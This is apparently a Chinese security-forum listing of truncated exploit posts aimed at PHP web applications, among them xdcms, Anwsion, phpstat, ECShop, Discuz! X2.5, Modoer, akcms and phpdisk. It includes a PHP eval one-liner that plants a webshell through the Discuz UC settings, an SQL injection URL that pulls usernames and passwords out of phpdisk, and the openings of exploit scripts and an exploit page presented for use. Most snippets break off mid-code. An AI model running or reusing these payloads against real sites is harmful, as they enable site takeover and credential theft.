Web安全
最新xdcms_v2.0.2 0DAY
开始吧在留言的地方lists.php文件<?phpclass lists extends db{public function init(){$input=base::load_class('input');$formid=isset($_GET)?intval($_GET):0;$form_arr=base::load_cache("cache_form","_form");$form=get_array($form_arr,'id',$formid,0);$field=base::load_cache("cache_form_"
Anwsion(v1.1-Beta4) 注入
\app\home\main.php(85): public function explore_action() { // 省略........... By.Rices -> Forum: T00ls.Net -> Blog: Rices.so if ($_GET) { if (is_numeric($_GET)) //据说以前这里也可以注射 所以被isnum
phpstat 读文件
./count/count.com.php$website = $_GET;$image = $_GET;//确定图片if(!$image)$imagesrc = "../templates/".TPL_NAME."/".TPL_IMGDIR."/icos/countlogo1.gif";else$imagesrc = "../templates/".TPL_NAME."/".TPL_IMGDIR."/icos/".$image;//发送图片 header("Content-type: image/gif");readfile($i
ECShop <= v2.7.3 SQL injection / exploit
{:6_449:} 好像是最新的<?phpprint_r('+---------------------------------------------------------------------------+ECShop <= v2.7.3 SQL injection / exploitby 帅的一塌糊涂mail: hiqiushuiabc gmail dot comteam: http://hi.baidu.com/w5r2dork: "Powered by ECShop"+-----------------------
Discuz! X2.5管理后台uc配置 get webshell漏洞
首先,进入后台以管理员身份登录; 然后,打开站长→UC设置 看截图:在UC设置ip地址里面填写 经过处理的一句话如下 Madman\’);eval($_POST)?>;// QQ 然后保存即可。 连接地址:http://bbs.xxxxx.com/config/config_ucenter.php
补发20120407 Discuz! X2.5 远程代码执行漏洞及EXP[XDAY]
最近大家开始关注discuz了,由于之前t00ls关站好久,错过一些dz的漏洞,转载下。if(!defined('IN_DISCUZ')) {@@ -89,7 +89,7 @@}}if($searcharray && $replacearray) {- $content = preg_replace("/(.*?)|()|(\(\d+)\)/ies", 'helper_seo::base64_transform("encode", "", "\\1\\2\\3", "")', $content
Modoer EXP
声明:本漏洞是t00ls -- 大牛挖的!本菜自己需要用就写了一个!!<html><head><title> Modoer EXP </title><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /></head><script language="javascript"> function expstart() { var url = document.forms.url.value; if(url !
Modoer 点评系统注射 几个版本通杀
不给力的注射, 搞某站挖的, 查了下没什么大站用这个 影响不大 发出来大家交流学习, 废话不多说, 看我们的猪肉点~~~~~{:6_409:}首先\core\modules\item\ajax.php开始调用~$do = trim($_GET);$op = trim($_GET);// 允许的操作行为$allowacs = array( 'respond', 'review', 'subject', 'picture', 'guestb
akcms代码执行漏洞
上周挖出的akcms的后台模版getshell感觉没什么新意,然后又仔细看了看代码,发现了一个比较有“前途”的洞,代码执行漏洞,而且出问题函数是作者提供给建站用户进行二次开发时使用的,也就是说这个问题放大的程度也会要大些。 0x01原理分析 漏洞问题主要存在于include\common.func.php文
phpdisk 老漏洞新用法 以及后台拿SHELL办法
以前暴出过通杀0DAY代码如下 /api/datacall.php?type=user&limit=1&order=1 and(select 1 from(select count(*),concat((select (select (select concat(0×27,0x7e,pd_users.username,0×27,0x7e,pd_users.password,0×27,0x7e) from pd_users where userid=1 limit 0,1)) from information_schema.ta